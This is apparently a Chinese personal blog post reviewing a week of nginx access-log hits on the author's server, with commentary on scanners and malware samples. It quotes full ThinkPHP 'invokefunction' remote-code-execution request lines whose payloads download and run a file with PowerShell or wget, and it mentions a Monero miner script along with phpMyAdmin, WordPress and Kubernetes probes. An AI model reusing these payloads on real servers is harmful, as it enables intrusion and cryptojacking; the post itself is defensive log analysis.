一周 access.log 总结

Re:Linked

这并不是个周更节目。不过也有可能变成一个周更节目。

access.log 是 nginx 访问日志的默认文件名。如果你有一个对公网开放 HTTP(S) 服务的服务器,那么一段时间后的 nginx 日志可能会变得很有趣。这里我们选择几个有趣的地方进行分析。

敏感位置以 [REDACTED] 替代。如仍有敏感内容请联系我进行修改。

IP,还是域名?

对于扫描而言,直接扫描 IP 的案例要比扫描域名的案例多得多。

几个有趣的故事

w00tw00t

GET /w00tw00t.at.blackhats.romanian.anti-sec:) 以及 GET /w00tw00t.at.ISC.SANS.DFind:)

看起来是某位在黑帽大会上面对所做的演示扫描。这篇文章大概讲了一下个中故事。

哪个系统又爆如此无聊的远程执行漏洞了?

GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile([REDACTED],[REDACTED]);start%20[REDACTED]

看起来是 Windows 端 .NET 应用专属漏洞?有趣。VirusTotal 已经有人提交过了。53/72 中奖。话说 9102 年了,哪个 Windows 服务器不也得装点杀毒软件什么的…

之后我又看到了这个:

GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20[REDACTED]%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;

VirusTotal 结果。现在 Windows 平台杀毒软件是连 Linux 脚本都能扫描了,不错。

这个 Linux 脚本又从线上下载下来另外一个 ELF 文件(VirusTotal),从传入的参数看起来,是个门罗币矿机。至于这个脚本,在下载矿机到 /tmp之前,它先清空 crontab,然后杀掉本地 CPU 时间超过五分钟的进程,之后时刻检查(while true)是否有两个矿机在并行运行。这个样子一重启不就什么都没有了么…

还有一个没什么意思的:

GET /FxCodeShell.jsp?view=[REDACTED]&os=1&address=[REDACTED]

与此相关的 payload 在 VirusTotal 上的结果: 这里

To k8s or not k8s, that’s a problem

GET /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/

您好,不是;谢谢,再见。我很 #poor 所以并没有在云计算上跑 k8s 的习惯。顺便说一句,我在本地也没跑过。

\xe4\xbd\xa0\xe8\xaf\xb4\xe5\x95\xa5\xef\xbc\x9f

b"\xe4\xbd\xa0\xe8\xaf\xb4\xe5\x95\xa5\xef\xbc\x9f".decode('utf-8') = '你说啥?'

GET \x16\x03\x01\x02

这是一段 TLS 握手的开头。这个样子我听不懂的请讲拆尼斯啊。

其余热门景点

  • GET /phpMyAdmin/scripts/setup.php
  • GET /mysql/admin/index.php?lang=en
  • GET /pma/scripts/setup.php
  • GET /phpmy/scripts/setup.php
  • GET //MyAdmin/scripts/setup.php
  • GET /db/scripts/setup.php

(大多数来自 ZmEu 扫描器。建议以后各位 PhpMyAdmin 用户把 PMA 藏在更深的目录下,例如/i/use/php/because/kobayashi/also/uses/it。)

  • GET /wordpress/wp-login.php
  • GET /wp8/wp-login.php
  • GET /wp7/wp-login.php
  • GET /wp6/wp-login.php
  • GET /wp5/wp-login.php
  • GET /wp4/wp-login.php
  • GET /wp3/wp-login.php
  • GET /wp2/wp-login.php
  • GET /wp1/wp-login.php

(IP 都不一样而且还是浏览器的 User-Agent,可惜我不用 Wordpress。所以这是什么路径?)

  • 以及理所当然的无数个 GET /

评论